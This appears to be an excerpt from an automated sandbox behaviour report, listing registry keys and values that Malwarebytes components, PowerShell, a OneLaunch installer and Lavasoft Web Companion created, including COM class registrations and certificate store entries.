| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\conhost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\MY | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{44AC1571-055F-4CC8-B7D8-EA022C4CC112}\ = "ICleanControllerEventsV6" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{46AEAC9A-C091-4B63-926C-37CFBD9D244F} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CCEFCD43-B934-4168-AE51-6FE07D3D0624}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{118F4330-CAF5-4A54-ABB0-DC936669ED2F}\TypeLib\ = "{5709DEEB-F05E-4D5C-8DC4-3B0D924EE08F}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D7A05281-DB9E-4E02-9680-E4D83CDAA6AB} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{96C7187E-6EC4-49BD-88C7-04A3A8A97CC5}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FB81F893-5D01-4DFD-98E1-3A6CB9C3E63E}\ = "IMWACControllerV12" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D88AC9B4-2BC3-4215-9547-4F05743AE67B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D4AC5360-A581-42A7-8DD6-D63A5C3AA7F1} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{783B187E-360F-419C-B6DA-592892764A01} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8307A4A5-A025-438B-B23B-8EE38A453D54}\TypeLib\ = "{332AFEBA-9341-4CEC-8EA6-DB155A99DF63}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E46A48DF-07CC-4C7F-89BB-145CF0DFC60A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FFB94DF8-FC15-411C-B443-E937085E2AC1}\1.0\HELPDIR\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8B05F69B-4F9B-4FD3-A491-16153F999E00}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F3968E6D-3FD5-4707-A5A8-4E8C3C042062} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{01222402-A8AB-4183-8843-8ADBF0B11869}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0F2D6C4F-0B95-4A53-BA9D-55526737DC34}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55E4B8FB-921C-4751-8B2D-AE33BD7D0B74}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7AEBAD20-B80A-427D-B7D5-D2983291132E}\ = "ICustomScanParameters" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FB81F893-5D01-4DFD-98E1-3A6CB9C3E63E}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2F14F58B-B908-4644-830F-5ACF8542D27F} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FA484BC6-E101-4A87-AAF3-B468B3F2C6BB}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EEC295FA-EC51-4055-BC47-022FC0FC122F}\1.0\0\win64 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{61964EBA-D9C0-4834-B01C-A6133F432BB1}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FA6C70E7-6A6D-4F4A-99BF-C8B375CB7E0C}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B32065E5-189E-4C5F-AA59-32A158BAF5B7}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2A153977-1A37-4EF7-9226-9E128FA51AE1}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{49F6AC60-2104-42C6-8F71-B3916D5AA732}\1.0\0\win64\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\\8" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F275D775-3A22-4C5A-B9AD-6FE8008304D0}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A9AE95CF-6463-415A-94AC-F895D0962D30}\ = "IUpdateControllerV12" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MB.UpdateController | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{31A02CB9-6064-4A3B-BCB4-A329528D4648}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{25321640-5EF1-4095-A0DA-30DE19699441}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5250E5C8-A09C-4F87-A0DA-A46A62A0EACF}\ = "IArwControllerV3" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E1F91DE-30AF-469B-9A09-FCF176207F0F}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FA484BC6-E101-4A87-AAF3-B468B3F2C6BB}\TypeLib\ = "{74630AE8-C170-4A8F-A90A-F42D63EFE1E8}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BFC6C7E6-8475-4F9B-AC56-AD22BECF91C4}\TypeLib\ = "{783B187E-360F-419C-B6DA-592892764A01}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF153224-DA64-41F1-AA87-321B345870FA} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B1BDE8B0-F598-4334-9991-ECC7442EEAA6}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B9F73DD6-F2A4-40F8-9109-67F6BB8D3704}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B1F1EB48-7803-4D84-B07F-255FE87083F4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9669A3D-81E8-46F6-A51E-815A0863D612}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6C5B978B-68C9-45C7-9D6E-0BA57A3C7EB2} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{993A5C11-A9B8-41E9-9088-C5182B1F279A} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{21EA9E3C-6507-4725-8F4F-ED4DDDE7A709}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MBAMExt.MBAMShlExt.1 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B38EDC4F-A2CD-4F76-8607-F123FE4031D5}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E2D56B7B-4B87-45A1-A6D3-5C77035141A6}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DC97FF29-5CE2-4897-8175-94672057E02D}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{08927360-710B-483B-BEEC-17E51FF84AF9}\ = "_IRTPControllerEventsV6" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31BF2366-C6DB-49F1-96A5-8026B9DF4152}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ADCD8BEB-8924-4876-AE14-2438FF14FA17}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\mbshlext.dll" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\TypeLib\ = "{74630AE8-C170-4A8F-A90A-F42D63EFE1E8}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BADF77CD-ECCE-4B36-88FF-6A2804FFE307}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD3CFEBD-3B8E-4651-BB7C-537D1F03E59C} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{616E9BE3-358B-4C06-8AAB-0ACF8D089931} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ADCD8BEB-8924-4876-AE14-2438FF14FA17}\ = "IPoliciesControllerV5" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\wbappbar | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{993A5C11-A9B8-41E9-9088-C5182B1F279A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
